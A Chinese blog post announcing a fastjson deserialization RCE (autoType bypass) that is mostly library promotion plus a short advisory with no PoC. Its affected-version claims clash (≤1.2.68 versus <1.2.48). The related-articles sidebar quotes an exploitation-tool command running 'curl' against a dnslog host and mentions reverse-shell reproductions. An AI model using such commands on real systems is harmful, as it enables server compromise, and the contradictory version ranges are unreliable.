fastjson 版本_又有得玩了,阿里巴巴旗下的fastjson爆rce漏洞

最新推荐文章于 2024-06-24 23:59:21 发布
最新推荐文章于 2024-06-24 23:59:21 发布
阅读量155 收藏
点赞数
文章标签: fastjson 版本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39899630/article/details/112104396
版权

JSON,全称:JavaScript Object Notation,作为一个常见的轻量级的数据交换格式,应该在一个程序员的开发生涯中是常接触的。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。

现在主流的对象与 JSON 互转的工具很多,我们主要介绍今天的主角,阿里巴巴的开源库 - Fastjson。Fastjson是一个Java库,可用于将Java对象转换为其JSON表示。它还可用于将JSON字符串转换为等效的Java对象。Fastjson可以处理任意Java对象

55b1524d4367e94e6706bbe129de43d8.png

什么是 Fastjson?

阿里官方给的定义是, fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

Fastjson 的优点

  • 速度快 fastjson相对其他JSON库的特点是快,从2011年fastjson发布1.1.x版本之后,其性能从未被其他Java实现的JSON库超越。
  • 使用广泛 fastjson在阿里巴巴大规模使用,在数万台服务器上部署,fastjson在业界被广泛接受。在2012年被开源中国评选为最受欢迎的国产开源软件之一。
  • 测试完备 fastjson有非常多的testcase,在1.2.11版本中,testcase超过3321个。每次发布都会进行回归测试,保证质量稳定。
  • 使用简单 fastjson的 API 十分简洁。
  • 功能完备 支持泛型,支持流处理超大文本,支持枚举,支持序列化和反序列化扩展。

说了这么多!漏洞情报来啦

fastjson 当前版本为 1.2.68 发布于 3 月底,日前某安全运营中心监测到,fastjson <= 1.2.68 版本存在远程代码执行漏洞,漏洞被利用可直接获取服务器权限。360CERT 将漏洞等级定为“高危”

dab25849f23d329ec90589abe3f3dac6.png
0db43b55df7fa0f07273d05725bddd20.png

该远程代码执行漏洞原理是,autotype 开关的限制可以被绕过,链式反序列化攻击者可以通过精心构造反序列化利用链,最终达成远程命令执行。此漏洞本身无法绕过 fastjson 的黑名单限制,需要配合不在黑名单中的反序列化利用链才能完成完整的漏洞利用

漏洞描述

常用JSON组件FastJson存在远程代码执行漏洞,攻击者可通过精心构建的json报文对目标服务器执行任意命令,从而获得服务器权限。此次爆发的漏洞为以往漏洞中autoType的绕过。

影响范围

FastJson < 1.2.48

漏洞描述

利用该0day漏洞,恶意攻击者可以构造攻击请求绕过FastJSON的黑名单策略。例如,攻击者通过精心构造的请求,远程让服务端执行指定命令。

POC

请实时关注github

weixin_39899630
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson RCE漏洞利用与防护手段
不忘初心,护天下安全!
07-12 705
Fastjson是Alibaba开发的Java语言编写的高性能JSON库,用于将数据在JSON和Java Object之间互相转换,提供两个主要接口JSON.toJSONString和JSON.parseObject/JSON.parse来分别实现序列化和反序列化操作。项目地址:https://link.zhihu.com/?target=https%3A//github.com/alibaba/fastjson随着该框架的使用,安全人员发现了一系列反序列化漏洞,每一次都是IT界的“地震”。漏洞合集见:Fa
fastjson-1.2.66版 2020年最新发布,继续加固安全
03-13
fastjson 1.2.66 已发布,这又是一个维护版本,修复了一些 BUG,并且做安全加固,补充了 AutoType 黑名单。 Issues 修复某些场景下BeanToArray报错的问题 修复某些场景多版本共存导致的的兼容问题 修复JSONArray构造方法中,由null List会引发的NPE问题 修复大对象某些场景会报错的问题 #2779 修复字符串自动转换为数值时,小数点后全零报错的问题 #2838 修复某些场景下不识别Kotlin泛型的问题 修复开始SupportNonPublicField特性后JSONField配置name不支持private字段的问题 #2866 修复纳秒级 Timestamp 解析异常问题 #2894 日期自动识别增强对纳秒时间的支持的 支持对Queue类型的反序列化 修复JSONField 在LocalDateTime类型时 format 不生效问题 修复JSONValidator有些场景不能识别非法JSON数据的问题 #3017 加强安全防护
阿里巴巴开源平台发布fastjson 1.0.5版本
iteye_20511的博客
06-09 200
版本1.0.5,对Parser和Serializer提供了更多的可扩展性。在Parser方面,提供了新的扩展方式能够定制Deserializer,还支持TypeReference来提供类型信息。在Serializer方面,主要是提供新特性NameFilter和ValueFilter。 官方主页:[url]http://code.alibabatech.com/wiki/display/Fas...
fastjson1.2.24反序列化RCE
最新发布
qq_61860998的博客
06-24 1209
fastjson1.2.24反序列化RCE
fastjson多个版本 1.2.2、1.2.31、1.2.47、1.2.53、1.2.54、1.2.62、1.2.73、1.2.74版本
12-11
fastjson的多个版本fastjson 1.2.2版本fastjson 1.2.31版本fastjson 1.2.47版本fastjson 1.2.53版本fastjson 1.2.54版本fastjson 1.2.62版本fastjson 1.2.73版本fastjson 1.2.74版本
探秘Fastjson RCE:一款强大的安全漏洞验证工具
gitblog_00077的博客
05-23 347
探秘Fastjson RCE:一款强大的安全漏洞验证工具 项目地址:https://gitcode.com/shengqi158/fastjson-remote-code-execute-poc 项目介绍 fastjson-rce-poc 是一个针对Fastjson库的安全漏洞验证项目,它可以帮助开发者和安全研究人员检测其应用程序是否易受远程代码执行(RCE)攻击。该项目提供了一种简单的方法来编译...
Fastjson 1.2.66 版本发布,继续加固安全!
程序猿DD
03-04 2230
点击上方蓝色“程序猿DD”,选择“设为星标”回复“资源”获取独家整理的学习资料!来源 |https://www.oschina.net/news/113770/fastjson-1-2...
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
《深入解析Fastjson-RCE漏洞及其利用》 Fastjson,作为一个高效、强大的Java语言中用于处理JSON数据的库,被广泛应用于各种系统和项目中。然而,任何软件都可能存在潜在的安全隐患,Fastjson也不例外。"fastjson-...
fastjson_rce_tool-master.zip
05-14
本文将深入探讨Fastjson中的远程代码执行(RCE漏洞,并介绍“fastjson_rce_tool-master”这个工具的相关知识。 Fastjson RCE漏洞通常发生在Fastjson解析不安全的JSON字符串时,允许攻击者通过构造特定的输入,...
版本fastjson-1.2.71解决安全漏洞.rar
04-14
Fastjson阿里巴巴开源的一款高性能的Java JSON库,它在处理JSON数据时提供了快速且便捷的解析和序列化功能。然而,随着广泛使用,Fastjson在早期版本中出现了一些安全漏洞,这些漏洞可能导致远程代码执行(RCE)和...
fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2232
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
探秘Java安全漏洞fastjson-RCE PoC工具包
gitblog_00074的博客
06-19 432
探秘Java安全漏洞fastjson-RCE PoC工具包 项目地址:https://gitcode.com/Lonely-night/fastjson_gadgets_scanner 在这个数字化的时代,软件安全至关重要,尤其是当我们谈论企业级应用时。开源社区一直是推动技术创新的重要力量,今天我们将深入探讨一个独特的开源项目——decomplie_jar和fastjson,这是一个专门针对Ja...
FastjsonRCE1.2.47】漏洞复现
02-24 1350
Fastjson漏洞原理和RCE1.2.47漏洞复现
Java - FastjsonRCE攻击模拟(远程代码执行漏洞
Zong_0915的博客
12-03 1645
Java - FastjsonRCE问题分析及攻击模拟(远程代码执行漏洞Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
热门Fastjson 中出现高危RCE漏洞
smellycat000的专栏
06-17 1284
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了最近修复的位于热门 Fastjson 库中的一个高危漏洞(CVE-2022-25845),它可被用于执行远程代码。该漏洞和受支持的特性 “AutoType” 中的不受信任的反序列化有关。项目维护人员已于2022年5月23日在版本1.2.83中将其修复。JFrog 公司的研究员 Uriya Yavnie...
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 406
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
技术分享 | Fastjson-RCE漏洞复现
Jeeseen123的博客
05-26 492
Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本 Fastjson1.2.47以及之前的版本 复现 1.1 环境准备 攻击机1 用于接受反弹shell 系统:Win10 x64 安装nc,burpsuit
Fastjson 1.2.67前的UnSerializable RCE漏洞分析
Fastjson是由阿里巴巴开发的JSON解析库,它能够处理JSON格式的数据,将Java Bean对象序列化为JSON字符串,反之亦然。然而,这个功能引入了一种风险,即通过反序列化不安全的数据可能导致远程代码执行(RCE)。 漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值